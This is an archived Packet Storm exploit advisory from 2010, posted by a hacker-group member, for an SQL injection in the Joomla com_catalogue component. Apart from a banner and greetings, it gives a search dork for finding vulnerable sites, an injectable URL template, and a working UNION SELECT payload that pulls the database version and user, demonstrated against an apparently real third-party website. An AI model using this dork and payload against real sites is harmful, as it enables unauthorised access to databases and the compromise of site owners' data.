Joomla Catalogue SQL Injection

2010-11-27T00:00:00
ID PACKETSTORM:96189
Type packetstorm
Reporter XroGuE
Modified 2010-11-27T00:00:00

Description

                                        
                                            `=======================================================================  
# Joomla Component (com_catalogue) SQL Injection Vulnerability  
=======================================================================  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1  
3 3  
3 _ __ __ ________ __ __ 3  
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7  
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1  
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3  
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3  
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7  
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1  
3 >> Exploit database separated by exploit 3  
3 type (local, remote, DoS, etc.) 3  
7 7  
1 [+] Site : 1337db.com 1  
3 [+] Support e-mail : submit[at]1337db.com 3  
3 3  
7 ######################################### 7  
1 I'm XroGuE 1337 Member from 1337 DataBase 1  
3 ######################################### 3  
3 3  
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7  
  
# Name: Joomla Component (com_catalogue) SQL Injection Vulnerability  
  
# Vendor: N/A  
  
# Date: 2010-11-25  
  
# Author: XroGuE  
  
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com  
  
# Home: www.Ashiyane.org/forums/   
  
# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !  
  
==========================================================================  
  
[+] Dork: inurl:"index.php?option=com_catalogue"  
  
==========================================================================  
  
[+] vuln: http://127.0.0.1/index.php?option=com_catalogue&Itemid=73&cat_id=[SQLi]  
  
  
[+] Demo: http://www.cobwebs.ie/index.php?option=com_catalogue&Itemid=73&cat_id=-999 union select 1,version(),user(),4,5,6  
  
==========================================================================   
`